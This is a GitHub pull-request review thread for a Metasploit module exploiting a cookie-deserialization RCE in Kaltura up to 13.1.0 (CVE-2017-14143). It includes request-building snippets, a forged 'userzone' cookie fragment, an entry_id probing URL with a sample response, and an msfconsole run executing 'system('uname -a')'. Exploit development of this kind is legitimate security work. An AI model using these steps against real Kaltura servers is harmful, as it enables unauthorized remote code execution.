Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) #9114
It's awesome to see that people continue the work and pick up the flag from where we left it.

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
Use `vars_get` for GET parameters.
Use the `normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries')` format. `normalize_uri` will concatenate them for you.
Example: #8980
Using the `'keditorservices,getAllEntries'` syntax did not work, but `'keditorservices', 'getAllEntries'` did.
Personally I do not find this cleaner than `'index.php/keditorservices/getAllEntries'`, but I will stick with the (slightly adjusted) suggestion from you now.
Oh, I guess it was a typo ;)
Yes, it was a typo, sorry. Also, this was what the maintainers suggested to me when I sent my first PR ;)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"),
Same here.
Use `vars_get` for GET parameters.
Use the `normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries')` format. `normalize_uri` will concatenate them for you.
Example: #8980
if res and res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
elsif res and res.code != 200
print_error("Unexpected response...")
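Review bot: `if res and res.redirect?` and `elsif res and res.code != 200` use `and` where `&&` is meant; `and` binds much more loosely than `&&` in Ruby, rubocop flags it, and it reads as a control-flow keyword rather than a boolean operator. The branches also leave the no-response case silent: when `res` is `nil` neither condition fires and nothing is printed, so add a first branch for it, e.g. `if res.nil?` followed by `print_error('No response from the server')`, and then use `elsif res.redirect?` and `elsif res.code != 200` for the remaining cases.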
Use single quotes: `print_error('Unexpected response...')`
)
end

def check
As far as I can understand, you need to use a valid entry_id. So why don't you directly send an HTTP request to `[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l` and look for `0_28bwo20l` in the returned XML file.

Valid entry_id:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l

Response:
```xml
<assets>
<asset id="0_28bwo20l" name="PAISD Mobile App Video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1" thumbnail_path="/content/entry/thumbnail/4/278/0_28bwo20l_100001.jpg" credit="rpicon" source_link="file:/opt/kaltura/web/content/uploads/8221424122327.1663_1wfwuh0mo0wck8ccgokg.mov_.mov" duration="283" list_type="show" contributor_screen_name="ANONYMOUS"/>
</assets>
```

Invalid entry_id:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_ffffffff

Response:
```xml
<assets>
</assets>
```

Also adding module documentation to this PR would be awesome.
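An added stand-alone Ruby illustration of the two points raised so far in this review (keeping path segments and GET parameters separate, and deciding entry_id validity from the getAllEntries XML). This is not the module's code and not Metasploit's API: `build_request_uri` is a hypothetical stand-in for what `normalize_uri` plus `vars_get` do inside `send_request_cgi`, and the two XML bodies are constructed samples modelled on the responses quoted above; only the Ruby standard library is used.

```ruby
require 'rexml/document'
require 'uri'

# Hypothetical stand-in for normalize_uri + vars_get (NOT Metasploit's code):
# path segments are joined with single slashes and the query parameters are
# URL-encoded separately, so a user-supplied entry_id can never alter the path.
def build_request_uri(base_path, segments, vars_get)
  parts = ([base_path] + segments).map { |s| s.to_s.gsub(%r{\A/+|/+\z}, '') }
  "/#{parts.reject(&:empty?).join('/')}?#{URI.encode_www_form(vars_get)}"
end

# Decide whether entry_id is known to the server from a getAllEntries body:
# a known id comes back as an <asset id="..."/> element, an unknown one yields
# an empty <assets> element. Malformed XML is treated as "not valid".
def entry_id_valid?(body, entry_id)
  doc = REXML::Document.new(body)
  doc.elements.each('assets/asset') do |asset|
    return true if asset.attributes['id'] == entry_id
  end
  false
rescue REXML::ParseException
  false
end

# Constructed sample bodies modelled on the two responses quoted in the review.
VALID_RESPONSE = <<~XML
  <assets>
    <asset id="0_28bwo20l" name="Constructed sample" media_type="1" ready="1"/>
  </assets>
XML

EMPTY_RESPONSE = <<~XML
  <assets>
  </assets>
XML

if __FILE__ == $PROGRAM_NAME
  puts build_request_uri('/', %w[index.php keditorservices getAllEntries],
                         'list_type' => '15', 'entry_id' => '0_28bwo20l')
  p entry_id_valid?(VALID_RESPONSE, '0_28bwo20l')  # true
  p entry_id_valid?(EMPTY_RESPONSE, '0_ffffffff')  # false
end
```

The parse step is deliberately stricter than a `body.include?(entry_id)` substring test: the id must appear as the `id` attribute of an `asset` element, so an id that merely shows up inside some other attribute or in an error page does not count as valid.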
@@ -85,12 +89,29 @@ def check
Exploit::CheckCode::Safe
elsif res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
elsif not self.check_entryid()
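Review bot: `elsif not self.check_entryid()` should read `elsif !check_entryid`: `!` is preferred over `not`, and the explicit `self` receiver and the empty parentheses are redundant for a zero-argument method call, so rubocop reports all three. Because this branch is only reached after the `Safe` and `Vulnerable` tests, an invalid entry_id is diagnosed on the failure path; in that case the check cannot tell safe from vulnerable, so `Exploit::CheckCode::Unknown` is the honest result for this branch rather than `Safe`.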
Do you really need to use `self` and `()` in here? I sense a Python developer in here :-)
Shouldn't we check the validity of entry_id way before? I would call `check_entryid` at the very beginning of the `check` and `exploit` functions.
I want to keep the number of requests as low as possible, so `check` should only test for an invalid id if the request before failed and `exploit` should not check for a valid id every time a call is made. I'll remove the `self.` and `()`.
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}"
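Review bot: `'headers' => { 'Cookie' => "userzone=#{encoded}#{hash}" }` hand-builds a header the framework already manages; `send_request_cgi` accepts `'cookie' => "userzone=#{encoded}#{hash}"` directly, which keeps the request consistent with other modules and avoids a raw `Cookie` header colliding with any cookie the client sets itself. Passing `list_type` and `entry_id` through `vars_get` as done here is the right call: the framework URL-encodes those values, so a user-supplied ENTRYID cannot break the query string.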
Instead of defining the cookie within headers, you could directly use it as a parameter of the send_request_cgi method.
Example:
```ruby
res = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'blabla'),
  'cookie' => cookie
})
```
Hi there; would you please add documentation to this PR? You can see more about it here: https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation

@bwatters-r7 Where should I attach documentation for this PR?

@Pushpamk, please add a separate markdown document as specified in the guidance:
Sorry, I'm late to the party. I see @Pushpamk already made a new PR for this, awesome! Is there still something needed from me?

@rverton no worries; I love to see the community coming together! I have not gotten a chance to dig too much into this, but a quick run of rubocop (https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop) shows there are some stylistic hiccups in the code that could stand updates. The only thing I saw that I'd say has to change is some indentation mix-ups around line 142. If you get a chance, please check out that wiki article and run the code through rubocop for some stylistic changes. Not everything rubocop flags needs to be changed, as the document states, but I do take rubocop's suggestions to heart when I can. Otherwise, this just needs me to finish up some other tasks so it comes up in my queue. Thanks!

@bwatters-r7 all right, I just added the stylistic things suggested by rubocop. I hope this fits better now ;)

I ran through https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md to try and install Kaltura, but it failed both times, probably because I'm unfamiliar with the application. Is there an easier/faster installer around?

Setting up Kaltura was time-consuming. I failed several times until I noticed that you need to have a good amount of memory available, otherwise it will fail with strange error messages during the installation. The setup script is also error prone. I don't have a faster way to install, sorry :/

When you say "a good amount," can you quantify that? 1 GB, 8 GB? 32 GB?

A 512 MB VM failed for me, a 2 GB one worked.

If you have a pcap of this working, please send it in. I have not had time to try building Kaltura again.

Hi @bwatters-r7, this is the execution:
I also attached a tcpdump:

Thanks, @rverton! Likely not going to get to it this week, but I will try to review it next week.
Merge branch 'land-9114' into upstream-master
Release Notes

The exploits/linux/http/kaltura_unserialize_cookie_rce module has been added to the framework. It allows remote code execution through Kaltura video server software versions prior to 13.1.0. A valid entry_id is required for this exploit, and can be obtained from any media resource published on the Kaltura installation.
This PR adds a module to exploit the Kaltura <= 13.1.0 RCE via a cookie deserialization.

Verification example

```
msfconsole
use exploit/linux/http/kaltura_unserialize_cookie_rce
set RHOST host.com
set ENTRYID 0_kzn07urz
set payload generic/custom
set payloadstr "system('uname -a');"
run
```